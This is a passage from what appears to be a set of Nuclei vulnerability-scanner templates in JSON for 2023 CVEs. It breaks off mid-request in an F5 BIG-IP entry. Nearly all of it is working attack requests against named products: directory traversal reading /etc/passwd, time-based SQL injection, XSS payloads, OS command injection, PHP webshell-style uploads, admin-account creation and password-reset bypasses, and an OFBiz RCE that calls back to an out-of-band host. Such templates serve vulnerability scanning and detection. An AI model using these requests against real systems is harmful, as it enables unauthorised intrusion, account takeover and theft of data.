'~([a-z0-9]+)~'"]}]}]},{"id":"CVE-2023-27640","info":{"name":"PrestaShop tshirtecommerce - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(base64_decode(body), \"PrestaShop\", \"<?php\")"],"condition":"and"}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26347","info":{"name":"Adobe Coldfusion - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wddxPacket version=","<string>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4151","info":{"name":"Store Locator WordPress < 1.4.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/agile-store-locator"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=asl_ajax_handler&asl-nounce=<img src onerror=alert`document.domain`> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src onerror=alert`document.domain`>"]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1263","info":{"name":"Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cmp_get_post_detail&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"img\":","\"date\":","\"title\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28121","info":{"name":"WooCommerce Payments - Unauthorized Admin Access","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\nContent-Type: application/x-www-form-urlencoded\n\nrest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered_date\":","\"username\":","\"email\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[201]}],"extractors":[{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-27922","info":{"name":"Newsletter < 7.6.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"text/html\")","contains(tolower(body_2), \"_newsletter_\")","contains(body_2, \"><script>alert(document_domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-42343","info":{"name":"OpenCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27\"><svg%20onload=alert(document.domain)>"],"headers":{"Content-Type":"application/cmisquery+xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Apache Chemistry OpenCMIS","<svg onload=alert(document.domain)>"],"condition":"and"}]}]},{"id":"CVE-2023-4596","info":{"name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe\n\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"textarea-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"phone-1\"\n\n{{rand_int(10)}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"email-1\"\n\ntest@gmail.com\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"name-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"postdata-1-post-image\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"forminator_nonce\"\n\n{{forminator_nonce}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"current_url\"\n\n{{BaseURL}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"action\"\n\nforminator_submit_form_custom-forms\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Upload file</label>","forminator-field-upload"],"condition":"and"},{"type":"word","part":"body_2","words":["{\"success\":true","\"form_id\":\"{{form_id}}\"","\"behav"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"forminator_nonce","part":"body","group":1,"regex":["name=\"forminator_nonce\" value=\"([a-z0-9]+)\" \\/>"],"internal":true},{"type":"regex","name":"form_id","part":"body","group":1,"regex":["name=\"form_id\" value=\"([0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-4542","info":{"name":"D-Link DAR-8000-10 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /app/sys1.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src=x onerror=alert(document.domain)>","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress_username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress_username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress_username","group":1,"regex":["<dc:creator><!\\[CDATA\\[([A-Za-z]+)\\]\\]><\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress_username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ wordpress_username + \" WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-41599","info":{"name":"JFinalCMS v5.0.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39796","info":{"name":"WBCE 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /modules/miniform/ajax_delete_message.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code_1 == 200","contains(body, \"Record deleted successfully!\")"],"condition":"and"}]}]},{"id":"CVE-2023-2227","info":{"name":"Modoboa < 2.1.0 - Improper Authorization","severity":"critical"},"requests":[{"raw":["GET /api/v2/parameters/core/ HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: 7h3h4ckv157\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["label\":","default_password\":","authentication_type\":\"local"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-45136","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/xwiki/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"<script>alert(document.domain)</script>\", \"data-xwiki-reference\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"<?php phpinfo(); ?>\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name='formulaire_action_args'[^>]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-41109","info":{"name":"SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection","severity":"critical"},"requests":[{"raw":["POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1\nHost: {{Hostname}}\nCookie: AuthToken=; AuthGroup=superuser; UserName=admin\n\n{\"cmd\":\"{{payload}}\",\"arguments\":[]}\n"],"matchers":[{"type":"word","part":"body","words":["dd556350275e2ee0a2e877cea9c8a74a"]}]}]},{"id":"CVE-2023-38501","info":{"name":"CopyParty v1.8.6 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<img src=copyparty onerror=alert(document.domain)>\",\"\\\">go to\")"],"condition":"and"}]}]},{"id":"CVE-2023-36844","info":{"name":"Juniper Devices - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileData\": \"data:text/html;base64,{{base64(payload)}}\", \"fileName\": \"{{rand_base(5, \"abc\")}}.php\", \"csize\": {{len(payload)}}}]\n","POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileName\": \"{{rand_base(5, \"abc\")}}.ini\", \"fileData\": \"data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}\", \"csize\": \"97\" }]\n","GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"original_fileName\":","\"converted_fileName\":"],"condition":"and"},{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","part":"body_1","name":"phpfile","regex":["([a-f0-9]{64}\\.php)"],"internal":true},{"type":"regex","part":"body_2","name":"inifile","regex":["([a-f0-9]{64}\\.ini)"],"internal":true}]}]},{"id":"CVE-2023-5991","info":{"name":"Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["filename=","/etc/passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4220","info":{"name":"Chamilo LMS <= 1.11.24 - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------SwxF5rRaZb4lETWlpulXn3\n\n--------------------------SwxF5rRaZb4lETWlpulXn3\nContent-Disposition: form-data; name=\"bigUploadFile\"; filename=\"{{filename}}.txt\"\nContent-Type: application/octet-stream\n\n{{md5(num)}}\n\n--------------------------SwxF5rRaZb4lETWlpulXn3--\n","GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,\"{{md5(num)}}\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-51467","info":{"name":"Apache OFBiz < 18.12.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=import+groovy.lang.GroovyShell%3B%0A%0AString+expression+%3D+%22'nslookup+{{interactsh-url}}'.execute()%22%3B%0AGroovyShell+gs+%3D+new+GroovyShell()%3B%0Ags.evaluate(expression)%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-50917","info":{"name":"MajorDoMo thumb.php - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","rtsp_transport"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3077","info":{"name":"MStore API < 3.9.8 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"MStore API\")"],"condition":"and"}]},{"raw":["@timeout: 15s\nGET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27641","info":{"name":"L-Soft LISTSERV 16.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wa.exe?REPORT&z=4&\"><script>alert(document.domain)</script>a=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-4111","info":{"name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id="],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"You have an error in your SQL syntax\", \"><script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-35155","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/Main/?viewer=share&send=1&target=&target=%3Cimg+src+onerror%3Dalert%28document.domain%29%3E&includeDocument=inline&message={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Applications</h2>","Navigation</h2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2130","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"Supplier Name\")"],"condition":"and"}]}]},{"id":"CVE-2023-3936","info":{"name":"Blog2Social < 7.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Deleted 1<img src onerror=alert(document.domain)> posts"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39109","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47115","info":{"name":"Label Studio - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/signup/?&next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","POST /api/users/{{id}}/avatar/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF\n\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\nContent-Disposition: form-data; name=\"avatar\"; filename=\"nuclei.html\"\nContent-Type: image/png\n\n{{hex_decode(\"89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E\")}}\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","GET {{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"xpath","name":"csrftoken","internal":true,"attribute":"value","xpath":["/html/body/div/form/input"]},{"type":"json","part":"body","name":"id","internal":true,"json":[".id"]},{"type":"json","part":"body","name":"filename","internal":true,"json":[".avatar"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, 'text/html')","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-2009","info":{"name":"Pretty Url <= 1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=((username))&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=prettyurls HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=prettyurls HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<img src=x onerror=alert(document.domain)>\")","contains(body_3, \"prettyurls\")"],"condition":"and"}],"extractors":[{"type":"regex","internal":true,"name":"nonce","part":"body","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"]}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n<!DOCTYPE HTML>\n<html>\n<head>\n<title>Test</title>\n</head>\n<body>\n<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style=\"animation-name:x\" onwebkitanimationstart=\"eval(atob('{{base64(payload)}}'))\"></xss></p>\n</body>\n</html>\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-46747","info":{"name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","severity":"critical"},"requests":[{"raw":["POST /tmui/login.jsp HTTP/1.1\nHost: {{Hostname}}\nTransfer-Encoding: chunked, chunked\nContent-Type: application/x-www-form-urlencoded\n\n204\n{{ hex_decode(concat(\"0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d\",username,\"266e616d655f6265666f72653d267061737377643d\",password,\"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00\")) }}\n0\n\n"],"unsafe":true},{"raw":["PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(hex_decode(username)+\":\"+hex_decode(password))}}\nContent-Type: application/json\n\n{\"password\": \"{{password2}}\"}\n\n","POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{hex_decode(username)}}\", \"password\":\"{{pass}}\"}\n\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: 